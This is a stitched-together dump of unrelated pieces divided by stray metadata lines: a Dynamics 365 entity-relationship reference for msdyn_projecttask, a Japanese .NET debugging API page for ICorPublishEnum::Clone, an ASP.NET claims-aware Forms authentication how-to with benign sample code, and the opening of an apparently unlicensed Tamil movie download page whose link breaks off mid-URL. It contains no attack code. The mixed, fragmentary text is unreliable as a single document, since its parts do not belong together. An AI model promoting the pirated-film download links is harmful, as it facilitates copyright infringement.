NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_estimateline_Task"></a> msdyn_msdyn_projecttask_msdyn_estimateline_Task Same as msdyn_estimateline entity [msdyn_msdyn_projecttask_msdyn_estimateline_Task](msdyn_estimateline.md#BKMK_msdyn_msdyn_projecttask_msdyn_estimateline_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_estimateline| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_estimateline_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_fact_Task"></a> msdyn_msdyn_projecttask_msdyn_fact_Task Same as msdyn_fact entity [msdyn_msdyn_projecttask_msdyn_fact_Task](msdyn_fact.md#BKMK_msdyn_msdyn_projecttask_msdyn_fact_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_fact| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_fact_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task"></a> msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task Same as msdyn_invoicelinetransaction entity [msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task](msdyn_invoicelinetransaction.md#BKMK_msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_invoicelinetransaction| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: Restrict<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_journalline_Task"></a> msdyn_msdyn_projecttask_msdyn_journalline_Task Same as msdyn_journalline entity [msdyn_msdyn_projecttask_msdyn_journalline_Task](msdyn_journalline.md#BKMK_msdyn_msdyn_projecttask_msdyn_journalline_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_journalline| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_journalline_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: Restrict<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task"></a> msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task Same as msdyn_opportunitylinetransaction entity [msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task](msdyn_opportunitylinetransaction.md#BKMK_msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_opportunitylinetransaction| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: Restrict<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task"></a> msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task Same as msdyn_orderlinetransaction entity [msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task](msdyn_orderlinetransaction.md#BKMK_msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_orderlinetransaction| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask"></a> msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask Same as msdyn_projectapproval entity [msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask](msdyn_projectapproval.md#BKMK_msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_projectapproval| |ReferencingAttribute|msdyn_projecttask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_projecttask_parenttask"></a> msdyn_msdyn_projecttask_msdyn_projecttask_parenttask Same as msdyn_projecttask entity [msdyn_msdyn_projecttask_msdyn_projecttask_parenttask](msdyn_projecttask.md#BKMK_msdyn_msdyn_projecttask_msdyn_projecttask_parenttask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_projecttask| |ReferencingAttribute|msdyn_parenttask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_projecttask_parenttask| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: Cascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: Cascade<br />Share: Cascade<br />Unshare: Cascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask"></a> msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask Same as msdyn_projecttaskdependency entity [msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask](msdyn_projecttaskdependency.md#BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_projecttaskdependency| |ReferencingAttribute|msdyn_predecessortask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask"></a> msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask Same as msdyn_projecttaskdependency entity [msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask](msdyn_projecttaskdependency.md#BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_projecttaskdependency| |ReferencingAttribute|msdyn_successortask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskstatususer"></a> msdyn_msdyn_projecttask_msdyn_projecttaskstatususer Same as msdyn_projecttaskstatususer entity [msdyn_msdyn_projecttask_msdyn_projecttaskstatususer](msdyn_projecttaskstatususer.md#BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskstatususer) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_projecttaskstatususer| |ReferencingAttribute|msdyn_projecttaskid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_projecttaskstatususer| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: Cascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: Cascade<br />Share: Cascade<br />Unshare: Cascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask"></a> msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask Same as msdyn_quotelinescheduleofvalue entity [msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask](msdyn_quotelinescheduleofvalue.md#BKMK_msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_quotelinescheduleofvalue| |ReferencingAttribute|msdyn_projecttask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task"></a> msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task Same as msdyn_quotelinetransaction entity [msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task](msdyn_quotelinetransaction.md#BKMK_msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_quotelinetransaction| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid"></a> msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid Same as msdyn_resourceassignment entity [msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid](msdyn_resourceassignment.md#BKMK_msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_resourceassignment| |ReferencingAttribute|msdyn_taskid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_timeentry_projectTask"></a> msdyn_msdyn_projecttask_msdyn_timeentry_projectTask Same as msdyn_timeentry entity [msdyn_msdyn_projecttask_msdyn_timeentry_projectTask](msdyn_timeentry.md#BKMK_msdyn_msdyn_projecttask_msdyn_timeentry_projectTask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_timeentry| |ReferencingAttribute|msdyn_projecttask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_timeentry_projectTask| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: RemoveLink<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| <a name="manytoone"></a> ## Many-To-One Relationships Each Many-To-One relationship is defined by a corresponding One-To-Many relationship with the related entity. Listed by **SchemaName**. - [lk_msdyn_projecttask_createdby](#BKMK_lk_msdyn_projecttask_createdby) - [lk_msdyn_projecttask_createdonbehalfby](#BKMK_lk_msdyn_projecttask_createdonbehalfby) - [lk_msdyn_projecttask_modifiedby](#BKMK_lk_msdyn_projecttask_modifiedby) - [lk_msdyn_projecttask_modifiedonbehalfby](#BKMK_lk_msdyn_projecttask_modifiedonbehalfby) - [user_msdyn_projecttask](#BKMK_user_msdyn_projecttask) - [team_msdyn_projecttask](#BKMK_team_msdyn_projecttask) - [business_unit_msdyn_projecttask](#BKMK_business_unit_msdyn_projecttask) - [TransactionCurrency_msdyn_projecttask](#BKMK_TransactionCurrency_msdyn_projecttask) - [msdyn_bookableresourcecategory_msdyn_projecttask_resourcecategory](#BKMK_msdyn_bookableresourcecategory_msdyn_projecttask_resourcecategory) - [msdyn_msdyn_project_msdyn_projecttask_project](#BKMK_msdyn_msdyn_project_msdyn_projecttask_project) - [msdyn_msdyn_projecttask_msdyn_projecttask_parenttask](#BKMK_msdyn_msdyn_projecttask_msdyn_projecttask_parenttask) - [msdyn_msdyn_projectteam_msdyn_projecttask_AssignedTeamMembers](#BKMK_msdyn_msdyn_projectteam_msdyn_projecttask_AssignedTeamMembers) - [msdyn_msdyn_transactioncategory_msdyn_projecttask_transactioncategory](#BKMK_msdyn_msdyn_transactioncategory_msdyn_projecttask_transactioncategory) - [msdyn_organizationalunit_projecttask](#BKMK_msdyn_organizationalunit_projecttask) ### <a name="BKMK_lk_msdyn_projecttask_createdby"></a> lk_msdyn_projecttask_createdby **Added by**: System Solution Solution See systemuser Entity [lk_msdyn_projecttask_createdby](systemuser.md#BKMK_lk_msdyn_projecttask_createdby) One-To-Many relationship. ### <a name="BKMK_lk_msdyn_projecttask_createdonbehalfby"></a> lk_msdyn_projecttask_createdonbehalfby **Added by**: System Solution Solution See systemuser Entity [lk_msdyn_projecttask_createdonbehalfby](systemuser.md#BKMK_lk_msdyn_projecttask_createdonbehalfby) One-To-Many relationship. ### <a name="BKMK_lk_msdyn_projecttask_modifiedby"></a> lk_msdyn_projecttask_modifiedby **Added by**: System Solution Solution See systemuser Entity [lk_msdyn_projecttask_modifiedby](systemuser.md#BKMK_lk_msdyn_projecttask_modifiedby) One-To-Many relationship. ### <a name="BKMK_lk_msdyn_projecttask_modifiedonbehalfby"></a> lk_msdyn_projecttask_modifiedonbehalfby **Added by**: System Solution Solution See systemuser Entity [lk_msdyn_projecttask_modifiedonbehalfby](systemuser.md#BKMK_lk_msdyn_projecttask_modifiedonbehalfby) One-To-Many relationship. ### <a name="BKMK_user_msdyn_projecttask"></a> user_msdyn_projecttask **Added by**: System Solution Solution See systemuser Entity [user_msdyn_projecttask](systemuser.md#BKMK_user_msdyn_projecttask) One-To-Many relationship. ### <a name="BKMK_team_msdyn_projecttask"></a> team_msdyn_projecttask **Added by**: System Solution Solution See team Entity [team_msdyn_projecttask](team.md#BKMK_team_msdyn_projecttask) One-To-Many relationship. ### <a name="BKMK_business_unit_msdyn_projecttask"></a> business_unit_msdyn_projecttask **Added by**: System Solution Solution See businessunit Entity [business_unit_msdyn_projecttask](businessunit.md#BKMK_business_unit_msdyn_projecttask) One-To-Many relationship. ### <a name="BKMK_TransactionCurrency_msdyn_projecttask"></a> TransactionCurrency_msdyn_projecttask **Added by**: System Solution Solution See transactioncurrency Entity [TransactionCurrency_msdyn_projecttask](transactioncurrency.md#BKMK_TransactionCurrency_msdyn_projecttask) One-To-Many relationship. ### <a name="BKMK_msdyn_bookableresourcecategory_msdyn_projecttask_resourcecategory"></a> msdyn_bookableresourcecategory_msdyn_projecttask_resourcecategory **Added by**: Scheduling Solution See bookableresourcecategory Entity [msdyn_bookableresourcecategory_msdyn_projecttask_resourcecategory](bookableresourcecategory.md#BKMK_msdyn_bookableresourcecategory_msdyn_projecttask_resourcecategory) One-To-Many relationship. ### <a name="BKMK_msdyn_msdyn_project_msdyn_projecttask_project"></a> msdyn_msdyn_project_msdyn_projecttask_project See msdyn_project Entity [msdyn_msdyn_project_msdyn_projecttask_project](msdyn_project.md#BKMK_msdyn_msdyn_project_msdyn_projecttask_project) One-To-Many relationship. ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_projecttask_parenttask"></a> msdyn_msdyn_projecttask_msdyn_projecttask_parenttask See msdyn_projecttask Entity [msdyn_msdyn_projecttask_msdyn_projecttask_parenttask](msdyn_projecttask.md#BKMK_msdyn_msdyn_projecttask_msdyn_projecttask_parenttask) One-To-Many relationship. ### <a name="BKMK_msdyn_msdyn_projectteam_msdyn_projecttask_AssignedTeamMembers"></a> msdyn_msdyn_projectteam_msdyn_projecttask_AssignedTeamMembers See msdyn_projectteam Entity [msdyn_msdyn_projectteam_msdyn_projecttask_AssignedTeamMembers](msdyn_projectteam.md#BKMK_msdyn_msdyn_projectteam_msdyn_projecttask_AssignedTeamMembers) One-To-Many relationship. ### <a name="BKMK_msdyn_msdyn_transactioncategory_msdyn_projecttask_transactioncategory"></a> msdyn_msdyn_transactioncategory_msdyn_projecttask_transactioncategory See msdyn_transactioncategory Entity [msdyn_msdyn_transactioncategory_msdyn_projecttask_transactioncategory](msdyn_transactioncategory.md#BKMK_msdyn_msdyn_transactioncategory_msdyn_projecttask_transactioncategory) One-To-Many relationship. ### <a name="BKMK_msdyn_organizationalunit_projecttask"></a> msdyn_organizationalunit_projecttask **Added by**: Universal Resource Scheduling Solution See msdyn_organizationalunit Entity [msdyn_organizationalunit_projecttask](msdyn_organizationalunit.md#BKMK_msdyn_organizationalunit_projecttask) One-To-Many relationship. ### See also [About the Entity Reference](../about-entity-reference.md)<br /> [Programming reference for Dynamics 365 Customer Engagement](../programming-reference.md)<br /> [Web API Reference](/dynamics365/customer-engagement/web-api/about)<br /> <xref href="Microsoft.Dynamics.CRM.msdyn_projecttask?text=msdyn_projecttask EntityType" /> [!INCLUDE[footer-include](../../../../includes/footer-banner.md)]
33.920845
311
0.801688
yue_Hant
0.724822
bb264ed6ade45ad718e26492ff05e4688c7519f5
5,771
md
Markdown
docs/framework/security/claims-aware-aspnet-app-forms-authentication.md
erikly/docs
3de58af074aadfc5ad44c6c7106a0531d7cfa3e3
[ "CC-BY-4.0", "MIT" ]
1
2018-01-22T02:42:26.000Z
2018-01-22T02:42:26.000Z
docs/framework/security/claims-aware-aspnet-app-forms-authentication.md
erikly/docs
3de58af074aadfc5ad44c6c7106a0531d7cfa3e3
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/security/claims-aware-aspnet-app-forms-authentication.md
erikly/docs
3de58af074aadfc5ad44c6c7106a0531d7cfa3e3
[ "CC-BY-4.0", "MIT" ]
1
2020-11-16T19:24:50.000Z
2020-11-16T19:24:50.000Z
--- title: "How To: Build Claims-Aware ASP.NET Application Using Forms-Based Authentication" ms.custom: "" ms.date: "03/30/2017" ms.prod: ".net-framework" ms.reviewer: "" ms.suite: "" ms.technology: - "dotnet-clr" ms.tgt_pltfrm: "" ms.topic: "article" ms.assetid: 98a3e029-1a9b-4e0c-b5d0-29d3f23f5b15 caps.latest.revision: 6 author: "BrucePerlerMS" ms.author: "bruceper" manager: "mbaldwin" --- # How To: Build Claims-Aware ASP.NET Application Using Forms-Based Authentication ## Applies To - Microsoft® Windows® Identity Foundation (WIF) - ASP.NET® Web Forms ## Summary This How-To provides detailed step-by-step procedures for creating a simple claims-aware ASP.NET Web Forms application that uses Forms authentication. It also provides instructions for how to test the application to verify that claims are presented when a user signs in with Forms authentication. ## Contents - Objectives - Overview - Summary of Steps - Step 1 – Create a Simple ASP.NET Web Forms Application - Step 2 – Configure ASP.NET Web Forms Application for Claims Using Forms Authentication - Step 3 – Test Your Solution ## Objectives - Configure an ASP.NET Web Forms application for claims using Forms authentication - Test the ASP.NET Web Forms application to see if it is working properly ## Overview In .NET 4.5, WIF and its claims-based authorization have been included as an integral part of the Framework. Previously, if you wanted claims from an ASP.NET user, you were required to install WIF, and then cast interfaces to Principal objects such as `Thread.CurrentPrincipal` or `HttpContext.Current.User`. Now, claims are served automatically by these Principal objects. Forms authentication has benefited from WIF’s inclusion in .NET 4.5 because all users authenticated by Forms automatically have claims associated with them. You can begin using these claims immediately in an ASP.NET application that uses Forms authentication, as this How-To demonstrates. ## Summary of Steps - Step 1 – Create a Simple ASP.NET Web Forms Application - Step 2 – Configure ASP.NET Web Forms Application for Claims Using Forms Authentication - Step 3 – Test Your Solution ## Step 1 – Create a Simple ASP.NET Web Forms Application In this step, you will create a new ASP.NET Web Forms application. #### To create a simple ASP.NET application 1. Start Visual Studio and click **File**, **New**, and then **Project**. 2. In the **New Project** window, click **ASP.NET Web Forms Application**. 3. In **Name**, enter `TestApp` and press **OK**. ## Step 2 – Configure ASP.NET Web Forms Application for Claims Using Forms Authentication In this step you will add a configuration entry to the *Web.config* configuration file and edit the *Default.aspx* file to display claims information for an account. #### To configure ASP.NET application for claims using Forms authentication 1. In the *Default.aspx* file, replace the existing markup with the following: ``` <%@ Page Title="Home Page" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="TestApp._Default" %> <asp:Content runat="server" ID="BodyContent" ContentPlaceHolderID="MainContent"> <p> This page displays the claims associated with a Forms authenticated user. </p> <h3>Your Claims</h3> <p> <asp:GridView ID="ClaimsGridView" runat="server" CellPadding="3"> <AlternatingRowStyle BackColor="White" /> <HeaderStyle BackColor="#7AC0DA" ForeColor="White" /> </asp:GridView> </p> </asp:Content> ``` This step adds a GridView control to your *Default.aspx* page that will be populated with the claims retrieved from Forms authentication. 2. Save the *Default.aspx* file, then open its code-behind file named *Default.aspx.cs*. Replace the existing code with the following: ```csharp using System; using System.Web.UI; using System.Security.Claims; namespace TestApp { public partial class _Default : Page { protected void Page_Load(object sender, EventArgs e) { ClaimsPrincipal claimsPrincipal = Page.User as ClaimsPrincipal; if (claimsPrincipal != null) { this.ClaimsGridView.DataSource = claimsPrincipal.Claims; this.ClaimsGridView.DataBind(); } } } } ``` The above code will display claims about an authenticated user, including users identified by Forms authentication. ## Step 3 – Test Your Solution In this step you will test your ASP.NET Web Forms application, and verify that claims are presented when a user signs in with Forms authentication. #### To test your ASP.NET Web Forms application for claims using Forms authentication 1. Press **F5** to build and run the application. You should be presented with *Default.aspx*, which has **Register** and **Log in** links in the top right of the page. Click **Register**. 2. On the **Register** page, create a user account, and then click **Register**. Your account will be created using Forms authentication, and you will be automatically signed in. 3. After you have been redirected to the home page, you should see a table beneath the **Your Claims** heading that includes the **Issuer**, **OriginalIssuer**, **Type**, **Value**, and **ValueType** claims information about your account.
42.748148
376
0.681511
eng_Latn
0.956085
bb26745c97d8145896d7758fb61b3b8e67f3aea6
1,546
md
Markdown
docs/framework/unmanaged-api/debugging/icorpublishenum-clone-method.md
hyoshioka0128/docs.ja-jp
979df25b1da8e21036438e0c8bc5f4d61bd1181d
[ "CC-BY-4.0", "MIT" ]
1
2019-01-29T12:31:08.000Z
2019-01-29T12:31:08.000Z
docs/framework/unmanaged-api/debugging/icorpublishenum-clone-method.md
hyoshioka0128/docs.ja-jp
979df25b1da8e21036438e0c8bc5f4d61bd1181d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/debugging/icorpublishenum-clone-method.md
hyoshioka0128/docs.ja-jp
979df25b1da8e21036438e0c8bc5f4d61bd1181d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: ICorPublishEnum::Clone メソッド ms.date: 03/30/2017 api_name: - ICorPublishEnum.Clone api_location: - mscordbi.dll api_type: - COM f1_keywords: - ICorPublishEnum::Clone helpviewer_keywords: - Clone method, ICorPublishEnum interface [.NET Framework debugging] - ICorPublishEnum::Clone method [.NET Framework debugging] ms.assetid: c9a26ea3-b8eb-4b8e-854f-9a2ca26b3b39 topic_type: - apiref author: rpetrusha ms.author: ronpet ms.openlocfilehash: 12d9e468027e88cc74900364459f83d7e5125a9e ms.sourcegitcommit: 3d5d33f384eeba41b2dff79d096f47ccc8d8f03d ms.translationtype: MT ms.contentlocale: ja-JP ms.lasthandoff: 05/04/2018 --- # <a name="icorpublishenumclone-method"></a>ICorPublishEnum::Clone メソッド このコピーを作成[ICorPublishEnum](../../../../docs/framework/unmanaged-api/debugging/icorpublishenum-interface.md)オブジェクト。 ## <a name="syntax"></a>構文 ``` HRESULT Clone ( [out] ICorPublishEnum **ppEnum ); ``` #### <a name="parameters"></a>パラメーター `ppEnum` [out]アドレスへのポインター、`ICorPublishEnum`のこのコピーであるオブジェクトを`ICorPublishEnum`オブジェクト。 ## <a name="requirements"></a>要件 **プラットフォーム:** を参照してください[システム要件](../../../../docs/framework/get-started/system-requirements.md)です。 **ヘッダー:** CorPub.idl、CorPub.h **ライブラリ:** CorGuids.lib **.NET framework のバージョン:** [!INCLUDE[net_current_v10plus](../../../../includes/net-current-v10plus-md.md)] ## <a name="see-also"></a>関連項目 [ICorPublishEnum インターフェイス](../../../../docs/framework/unmanaged-api/debugging/icorpublishenum-interface.md)
29.730769
115
0.713454
yue_Hant
0.394611
bb26970a3b4b5318fde8482f40adfa7ba03db384
4,636
md
Markdown
_others/imports/2/2019-04-14-naadodi-tamil-movie-download.md
starisai/starisai.github.io
639897877921e0db60ba6ba0690e55a0234dfabc
[ "MIT" ]
null
null
null
_others/imports/2/2019-04-14-naadodi-tamil-movie-download.md
starisai/starisai.github.io
639897877921e0db60ba6ba0690e55a0234dfabc
[ "MIT" ]
null
null
null
_others/imports/2/2019-04-14-naadodi-tamil-movie-download.md
starisai/starisai.github.io
639897877921e0db60ba6ba0690e55a0234dfabc
[ "MIT" ]
2
2022-03-15T02:34:05.000Z
2022-03-15T02:36:25.000Z
--- title: "Naadodi Tamil Movie Download" date: "2019-04-14" --- ![Image result for naadodi 1966 Movie image](https://upload.wikimedia.org/wikipedia/en/thumb/d/d6/Nadodi_{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}281966_film{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}29.jpg/220px-Nadodi_{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}281966_film{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}29.jpg) **_Naadodi Sample Part.mp4_** **_Size: 3.86mb_** **_[Download Server 1](http://b4.wetransfer.vip/files/{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Actor{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Hits{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collection/M.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20G.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Ramachandran{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(M.G.R){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Movies{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collections/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966)/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Sample{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20HD.mp4)_** **_[Download Server 